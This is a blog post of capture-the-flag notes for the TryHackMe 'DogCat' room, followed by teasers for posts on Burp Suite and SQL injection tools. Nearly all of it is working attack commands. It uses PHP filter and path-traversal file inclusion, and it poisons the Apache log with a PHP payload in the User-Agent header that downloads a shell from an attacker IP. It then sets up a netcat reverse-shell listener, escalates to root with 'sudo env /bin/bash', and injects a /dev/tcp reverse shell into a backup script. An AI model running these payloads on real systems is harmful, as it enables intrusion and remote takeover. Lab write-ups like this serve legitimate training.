DogCat

http://10.10.120.68/?view=php://filter/convert.base64-encode/cat/resource=index

http://10.10.120.68/?view=php://filter/convert.base64-encode/cat/resource=flag

view-source:http://10.10.120.68/?view=../../../../etc/cat/../passwd&ext=

view-source:http://10.10.120.68/?view=../../../../var/log/apache2/cat/../access.log&ext=

https://toolbox.itsec.tamu.edu/


User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://10.8.135.218/shell.php'))?>


Shell folder:

cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php shell.php  

cat shell.php //Make sure to modify the IP and port inside the shell file

python -m http.server or 8081

rlwrap nc -lvnp 8888 

find / -type f -name flag* 2>/dev/null //to find all flags

Inside Shell:

$ cd /var/www/html


whoami

id

ls -la

sudo -l

sudo /usr/bin/env /bin/bash

cd /root


Final Flag:

rlwrap nc -lvnp 8888  

cd /opt/

cat backup.sh

tar cf /root/container/backup/backup.tar /root/container

sudo /usr/bin/env /bin/bash

echo '#!/bin/bash' > backup.sh

echo 'bash -i >& /dev/tcp/Attacking-IP/8888 0>&1' >> backup.sh

cat backup.sh

Exec :

bash -i >& /dev/tcp/Attacking-IP/8888 0>&1  || run in folder:  nc -lvnp 9001 


https://toolbox.itsec.tamu.edu/


Ref:

https://www.youtube.com/watch?v=zGDbi15Jkqw
https://tryhackme.com/room/dogcat

https://gtfobins.github.io/
https://highon.coffee/blog/reverse-shell-cheat-sheet/#php-reverse-shell
https://medium.com/@anhackx/dogcat-tryhackme-2024-916bc3b1b07d

Comments

Post a Comment

Popular posts from this blog

Burp Suite – Automated Vulnerabilities Findings

Image
  Burp Suite – Automated Vulnerabilities Findings Step 1:  Intercept with burp suite, which contains parameter values. Step 2: Forward the request to the Intruder option in Burp Suite. Step 3:  Set up the automated scan by right-clicking, selecting "Scan Defined Insertion Points" and opening the "Scan launcher". Step 4:  Wait until the scan is finished, and then check for the results with vulnerabilities. Step 5: Manual Validation
Read more

Havij - Advanced Automated SQL Injection

Image
Tool Name: Havij (Educational Purpose Only) Description: Havij is an automated SQL injection tool designed for penetration testers to identify and exploit SQL injection vulnerabilities in web applications. It streamlines the testing process, allowing security professionals to efficiently assess the security of a website's database interactions. Download URL:  https://www.darknet.org.uk/2010/09/havij-advanced-automated-sql-injection-tool/ Step 1:  Enter the application target link in the Havij tool and click analyze . Step 2: Get the application details from the Info Section. Step 3: Get the application database's from the  Tables  section. Step 4: Get the application database records with columns details. Successfully logged in the application as shown in the below screenshots.
Read more

SQL Injection Attacks | Shahul Hameed

Image
Lab 1:   SQL injection UNION attack, determining the number of columns returned by the query Introduction      This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.      To solve the lab, determine the number of columns returned by the query by performing an  SQL injection UNION  attack that returns an additional row containing null values. Solutions: Use Burp Suite to intercept and modify the request that sets the product category filter. Modify the  category  parameter, giving it the value  '+UNION+SELECT+NULL-- . Observe that an error occurs. Modify the  ...
Read more